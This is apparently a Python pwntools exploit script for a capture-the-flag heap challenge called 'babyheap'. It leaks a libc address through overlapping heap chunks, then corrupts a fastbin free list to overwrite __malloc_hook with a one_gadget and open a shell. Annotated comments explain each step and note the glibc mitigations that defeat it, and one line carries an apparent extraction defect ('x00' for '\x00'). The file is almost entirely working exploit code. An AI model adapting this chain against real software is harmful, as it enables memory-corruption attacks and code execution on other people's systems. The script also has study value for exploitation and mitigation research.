from pwn import *

# Module-level setup: spawn the challenge binary and resolve its libc.
# `elf.libc` is pwntools' lookup of the libc the binary loads; every hard-coded
# offset further down is specific to that exact libc build and must be
# re-derived for any other build.
p = process('./babyheap')
elf = ELF('./babyheap')
libc = elf.libc
def Alloc(size, content):
    """Menu option 1: request a chunk of `size` bytes and fill it with `content`.

    Drives the target's prompts in order; `size` is sent as its decimal string,
    `content` is sent verbatim.
    """
    dialogue = (
        ('choice: ', '1'),
        ('please input chunk size: ', str(size)),
        ('input chunk content: ', content),
    )
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)
def Show(index):
    """Menu option 2: ask the target to print the content of chunk `index`.

    Only drives the prompts; reading the printed content is left to the caller.
    """
    dialogue = (
        ('choice: ', '2'),
        ('please input chunk index: ', str(index)),
    )
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)
def Delete(index):
    """Menu option 3: free chunk `index` in the target."""
    dialogue = (
        ('choice: ', '3'),
        ('please input chunk index: ', str(index)),
    )
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)
def leak_libc():
    """Leak a libc pointer via overlapping heap chunks and return the libc base.

    The sequence below is order-sensitive: it grooms four chunks, corrupts the
    metadata of a neighbouring chunk through a re-allocation, frees so that
    glibc consolidates over an in-use chunk, and then reads the unsorted-bin
    pointer that ends up inside that in-use chunk. Returns `leak - offset`,
    where `offset` is a libc-build-specific constant.

    Mitigation note: later glibc releases add size/prev_size consistency checks
    on consolidation that abort this kind of chunk overlap.
    """
    Alloc(0x90, 'unsorted bin')   # chunk 0: 0xa0-byte chunk (unsorted-bin sized on free)
    Alloc(0x18, 'fast bin')       # chunk 1: 0x20-byte chunk (fastbin sized on free)
    Alloc(0xf0, 'unsorted bin')   # chunk 2: 0x100-byte chunk
    Alloc(0x10,'aaaa')            # chunk 3: keeps chunk 2 away from the top chunk
    Delete(1)
    Delete(0)
    # Re-allocate the 0x20 chunk and write 0x18 bytes: the trailing p64(0xc0)
    # lands on the next chunk's prev_size field (0xa0 + 0x20 = chunks 0 and 1
    # combined). NOTE(review): for the free below to consolidate backwards the
    # target must also clear that chunk's prev_inuse bit — presumably the
    # binary's own off-by-one write does this; confirm against the binary.
    Alloc(0x18, 'a'*0x10 + p64(0xc0))
    Delete(2)   # consolidates backwards over chunks 0 and 1 (one of which is still in use)
    # Carve 0xa0 bytes from the merged chunk; the remainder stays in the
    # unsorted bin and overlaps the still-allocated 0x18 chunk.
    Alloc(0x90, 'a'*0x90)
    # Index 0 presumably refers to the 0x18 chunk re-allocated above (slot
    # reuse on allocate is inferred from the sequence, not visible here); its
    # content now starts with the unsorted-bin fd pointer into libc.
    Show(0)
    p.recvuntil('content: ')
    # NOTE(review): 'x00' is almost certainly a dropped backslash ('\x00') from
    # extraction — ljust() requires a single fill character and would raise
    # TypeError as written.
    leak_addr = u64(p.recvn(6).ljust(8, 'x00'))
    offset = 0x3c4b78   # libc-build-specific: leaked arena pointer minus libc base
    libc_address = leak_addr - offset
    return libc_address
def fastbin_attack(one_gadget):
    """Corrupt a fastbin free list so malloc hands back memory near __malloc_hook, then hijack it.

    Args:
        one_gadget: absolute libc address written over __malloc_hook; the final
            256-byte allocation request below is what invokes it.

    Requires `libc.address` to have been set (see leak_libc) — every constant
    here is relative to it and specific to one libc build. The statement order
    is load-bearing and must not be changed.

    Mitigation note: this chain depends on an old libc — fastbin fd pointers
    are mangled (safe-linking) from glibc 2.32 and __malloc_hook was removed
    in glibc 2.34.
    """
    Delete(1)
    # Write past the 0x90 bytes of data into what presumably is the following
    # chunk's header: size 0x71 makes that chunk fastbin-sized on free.
    Alloc(0x100, 'a'*0x90+p64(0)+p64(0x71))
    Delete(0)
    Delete(1)
    # libc-build-specific: an address just below __malloc_hook whose bytes pass
    # the fastbin size check when interpreted as a chunk header.
    fake_chunk = libc.address + 0x3c4af5 -0x8
    # Same overwrite again, now also planting fake_chunk as the fd of the freed
    # 0x70 chunk, i.e. the next entry in that fastbin.
    Alloc(0x100, 'a'*0x90 +p64(0) + p64(0x71) + p64(fake_chunk))
    Alloc(0x60,'aaaa')   # pops the genuine 0x70 chunk
    # Pops fake_chunk; the 0x13 bytes of padding presumably align the write so
    # that one_gadget overwrites __malloc_hook.
    Alloc(0x60,'a'*0x13 + p64(one_gadget))
    # Trigger: any further malloc now goes through the hook. Only the size
    # prompt is answered; the content prompt is never reached.
    p.sendlineafter('choice: ','1')
    p.sendlineafter('please input chunk size: ','256')
def main():
    """Run the whole chain: leak libc, hijack __malloc_hook, then hand over the tty."""
    libc.address = leak_libc()
    log.success('libc address : ' + hex(libc.address))
    log.success('malloc hook : ' + hex(libc.symbols['__malloc_hook']))
    # libc-build-specific offset of the one_gadget used as the hook target.
    one_gadget = libc.address + 0x4526a
    fastbin_attack(one_gadget)
    p.interactive()


if __name__ == '__main__':
    main()